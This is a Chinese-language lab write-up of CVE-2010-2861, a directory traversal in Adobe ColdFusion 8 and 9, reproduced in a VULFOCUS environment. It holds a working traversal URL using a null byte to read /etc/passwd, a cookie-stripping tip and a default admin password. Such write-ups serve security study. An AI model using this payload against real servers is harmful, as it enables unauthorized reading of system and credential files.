[文件读取]coldfusion 文件读取 (CVE-2010-2861)

1.1漏洞描述

漏洞编号 CVE-2010-2861
漏洞类型 文件读取
漏洞等级 ⭐⭐
漏洞环境 VULFOCUS
攻击方式

描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 

1.2漏洞等级

高危

1.3影响版本

Adobe ColdFusion 8、9版本

1.4漏洞复现

1.4.1.基础环境

        访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。

[文件读取]coldfusion 文件读取 (CVE-2010-2861)_第1张图片

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址 

[文件读取]coldfusion 文件读取 (CVE-2010-2861)_第2张图片

[文件读取]coldfusion 文件读取 (CVE-2010-2861)_第3张图片

1.5深度利用

1.5.1漏洞点

访问

http://192.168.1.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

用burp截取,删除其中的cookie信息后,即可读取文件`/etc/passwd`:

[文件读取]coldfusion 文件读取 (CVE-2010-2861)_第4张图片

删掉后

[文件读取]coldfusion 文件读取 (CVE-2010-2861)_第5张图片

查找falg

[文件读取]coldfusion 文件读取 (CVE-2010-2861)_第6张图片

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

你可能感兴趣的:(文件读取,漏洞库,安全,网络,web安全)